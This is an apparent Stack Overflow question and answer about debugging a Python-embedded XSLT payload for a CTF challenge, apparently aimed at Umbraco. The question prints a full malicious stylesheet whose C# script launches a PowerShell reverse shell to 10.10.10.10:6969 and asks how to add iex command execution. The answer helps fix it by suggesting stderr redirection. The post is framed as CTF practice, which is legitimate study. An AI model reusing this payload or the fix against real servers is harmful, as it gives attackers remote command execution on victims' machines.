# Reverse shell using powershell

Tags: c#, powershell, xslt, umbraco, payload

I'm writing a payload for a CTF challenge to get a reverse shell. But a certain part of the code is causing XSLT compile error. The exploit is written in python and the payload variable is as follows:

```python
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "$client = New-Object System.Net.Sockets.TCPClient(\'10.10.10.10\',6969);\
 $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};\
 while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
 $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); \
 $sendback = \'M \'; $sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \'; \
 $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);\
 $stream.Flush();};$client.Close()"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';
```

where the value of **$sendback** should be **(iex $data 2>&1 | Out-String )** (I have written 'M' for now to troubleshoot), but it causes XSLT compile error when replaced with the iex command.

What is the problem?

**Edit:** I narrowed the problem, `$sendback=(iex $data | Out-String)` *works* but not with **"2>&1"**, Why?

Answer (score 0):

My guess based on your edit is that your StartInfo properties are incomplete.  Your PowerShell is trying to redirect streams but the only stream you're identifying on the process execution is STDOUT.  See this tidbit from ProcessStartInfo on MSDN:

> Standard input is usually the keyboard, and standard output and
>   standard error are usually the monitor screen. However, you can use
>   the RedirectStandardInput, RedirectStandardOutput, and
>   RedirectStandardError properties to cause the process to get input
>   from or return output to a file or other device. If you use the
>   StandardInput, StandardOutput, or StandardError properties on the
>   Process component, **you must first set the corresponding value on the
>   ProcessStartInfo property. Otherwise, the system throws an exception
>   when you read or write to the stream**.

https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.processstartinfo?view=netframework-4.8

..my bold.  So I would update your System.Diagnostics.Process.StartInfo properties to include all streams you want to capture (e.g. `proc.StartInfo.RedirectStandardError = true;` )